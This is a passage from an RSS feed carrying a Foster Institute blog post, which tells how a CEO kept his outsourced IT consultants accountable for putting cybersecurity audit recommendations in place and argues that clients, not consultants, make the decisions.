<p>The post <a href="https://fosterinstitute.com/if-you-outsource-your-it-it-is-their-job-to-keep-you-happy-not-the-other-way-around/">If You Outsource Your IT, it is Their Job to Keep You Happy, Not the Other Way Around.</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>After we performed a cybersecurity audit for a company many years ago, the President and CEO assigned the recommendations to their IT consulting firm. What is different about this lead executive is that he gently applies firm pressure on their IT consultants to complete the recommended improvements. He&#8217;s kind and respectful to his consulting company, communicates expectations, asks many questions, and involves himself in cybersecurity decisions.</p>



<p>I admire how he communicates, and I&#8217;ve asked him his secret. He tells me he focuses on his responsibility to protect his workers&#8217; and customers&#8217; sensitive information. Everything else falls into place.</p>



<p>If the consultants need to charge money to implement changes, he asks us if we feel the price is fair and then decides. He makes sure his consultants know he&#8217;s holding them accountable by bringing us back every year to audit the systems and provide new recommendations.</p>



<p>The outsourced computer consulting company was never upset and eagerly followed the executive&#8217;s directives. The IT firm has great respect for the executive because of his bold leadership. I admire the proficiency of his IT consulting firm in meeting requirements, even when they are surprised a customer has higher expectations than most of their other customers.</p>



<p>Fast forward many years: this company remains one of the most secure customers we have. The leader&#8217;s no-nonsense approach to cybersecurity works best. Thieves might have stolen the air conditioning compressor units from outside their buildings, but no hackers have broken into their network!</p>



<p>If you outsource IT, your consultant company respects that you make the decisions. They&#8217;ll welcome audit recommendations and your directives if you&#8217;re willing to pay a fair fee. Their goal is to keep you happy, not the other way around.</p>



<p>The post <a href="https://fosterinstitute.com/if-you-outsource-your-it-it-is-their-job-to-keep-you-happy-not-the-other-way-around/">If You Outsource Your IT, it is Their Job to Keep You Happy, Not the Other Way Around.</a> appeared first on <a href="https://fosterinstitute.com">Foster Institute</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
